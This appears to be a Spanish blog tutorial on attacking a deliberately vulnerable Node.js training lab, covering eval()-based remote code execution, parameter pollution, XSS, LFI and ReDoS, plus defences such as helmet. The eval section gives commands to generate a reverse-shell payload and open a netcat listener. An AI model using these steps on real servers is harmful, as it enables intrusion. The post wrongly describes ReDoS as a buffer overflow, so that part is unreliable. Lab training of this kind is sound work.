Node.js es un entorno en tiempo de ejecución multiplataforma, de código abierto, para la capa del servidor basado en el lenguaje de programación ECMAScript, asíncrono, con I/O de datos en una arquitectura orientada a eventos y basado en el motor V8 de Google.
Material:
https://github.com/ajinabraham/Node.Js-Security-Course
Les dejo el siguiente enlace es lo que necesitamos para hacer pruebas de nuestras explotaciones.
Descargar node js: https://nodejs.org/es/download/
Clonamos el repositorio utilizando git:
git clone https://github.com/ajinabraham/Node.Js-Security-Course.git
Accedemos a la carpeta desde el cmd o terminal.
Explotación
* Alcance de Variables
Tenemos el siguiente código del archivo global_scope.js, en este ejemplo estamos utilizando un framework llamado express que simplifica mucho el trabajo, para instalar express utilizamos el siguiente comando:
npm install express <- Esto hace que se instale el modulo express
node global_scope.js <- Esto ejecuta el archivo para el servidor node
Ahora el problema reside en que si accedemos desde el navegador por ejemplo chrome se muestra la siguiente pantalla:
Lo cual es normal, si accediéremos esta variable aumentaría lo cual esta bien, pero lo que pasa aquí es que si accedemos desde otro navegador, otra pc este archivo como esta en solo en el mismo archivo ejecutándose siempre en node va seguir y seguir en aumento lo cual esta mal. Desde firefox se mira asi:
* HTTP Parameter Pollution
El duplicar algunas variables aveces hace que el lenguaje de programación tome la primera ocurrencia de la misma, la ultima o ambas, en el caso de NodeJs toma todas. Esto nos da paso a diferentes tipos de evasión ante algunos firewalls o múltiples tipos de ataque en diferentes variables que son aceptadas por NodeJS.
Tenemos el siguiente código hpp.js, el cual hace una petición y muestra la variable id en el body asi como en consola. El problema reside cuando ejecutamos varias veces las variables, NodeJs toma todas las variables que le enviemos:
* Funcion eval() - RCE (Remote Code Execution)
Como su palabra lo dice eval() evalúa un código, esto puede ser muy peligroso ya que podemos matar el proceso ejecutándose osea el servidor mismo ya que es un solo archivo, realizar un Dos al navegador, etc. Otras funciones igual de peligrosas son:
- setInterval(codigo,2)
- setTimeOut(codigo,2)
- new Function(codigo)
En este ejemplo tenemos el siguiente código eval.js, el cual lo que hace es que toma una variable name y esta misma la evalua. Por ejemplo:
Vemos como se imprime un hola en consola, esto esta evaluando nuestro código nodejs, podríamos ejecutar algo mas peligroso como cerrar el proceso del servidor:
Generamos el vector de ataque usando:
python nodejsshell.py 127.0.0.1 666
donde 127.0.0.1 es la ip que esta a la escucha
y 666 es el puerto
Usamos:
nc -lvp 666
Para poner el puerto 666 a la escucha de todas las conexiones entrantes.
Aquí vemos como realizamos la conexión reversa efectivamente. El script en python esta realizado especialmente para una terminal de linux por lo que les recomiendo utilizar una terminal a la escucha usando netcat o instalar terminal de ubuntu si tienen windows 10 desde la tienda de windows.
* Entradas no validadas o verificadas
Al no validar las entradas en la aplicación web puede llegar a tener muchas de las vulnerabilidades que tienen las aplicaciones web comunes tal y como es: SQL Injection (En mongoDB es mas común en nodejs), XSS, LFI, SSRF, IDOR en el blog están varias entradas sobre este tipo de ataques ya que es muy común poder encontrarlas, les recomiendo usar el buscador y pegarles una leída y normalmente se encuentran en el top 10 de owasp. Veremos alguna de ellas:
XSS
Gracias a un XSS podemos inyectar codigo javascript dentro de la pagina.
Tenemos el siguiente archivo simple_server.js el cual contiene una variable name la cual es mostrada en el body de la pagina. Aquí tenemos un claro caso de un XSS reflejado.
LFI
Con LFI podemos encontrar archivos dentro del servidor locales, asi como intentar escalar privilegios.
El archivo es el siguiente dir_trasversal.js el cual pide un archivo dentro de la variable load, para cargarlo y mostrarlo en la pagina web.
* Ataque Denegacion de servicio en Expresiones Regulares
Uno de los ataques mas comunes puede llegar a suceder en NodeJS es que usando alguna entrada grande puedes causar un buffer overflow y hacer que el servidor caiga, realizando fuzzing o ataques brute force en aplicaciones NodeJS también puedes lograr una caída del server.
En este caso tenemos el siguiente archivo redos.js el cual contiene un parámetro email el cual es validado por una expresión regular que en realidad sea un email.
En el siguiente ejemplo ponemos un email valido y nos arroja un tiempo rápido de validación, pero si realizamos un ataque buffer overflow agregando demasiados caracteres para que la pila se desborde causa un Dos en el servidor, esto también sucede cuando el servidor recibe muchas peticiones con múltiples threads como un dirbuster, dirsearch o brute force.
* Information Disclousure
Esto es importante ya que nos ayuda a encontrar otros posibles ataques, es muy comun en la fase de reconocimiento.
- Cabeceras
- Cookies por defecto
- Paginas de Error
* Seguridad en las cabeceras
La seguridad en las cabeceras nos ayudan para saber si la aplicación permite CORS, si podemos ver las cookies en un alert, si podemos ejecutar javascript usando xss, etc. Las cabeceras pueden a llegar un aliado en nuestra aplicación si están bien configuradas.
https://securityheaders.com/
Puedes checar las cabeceras inseguras desde esta pagina.
como protección en NodeJS puedes utilizar la librería de helmet: https://github.com/helmetjs/helmet
Revisando el código caja blanca
Por ultimo si tienes el codigo puedes realizar un escaneo usando NodeJS Scan: https://github.com/ajinabraham/NodeJsScan
El cual es gratuito y muy completo, para realizar esta tarea automatizada.
No hay comentarios:
Publicar un comentario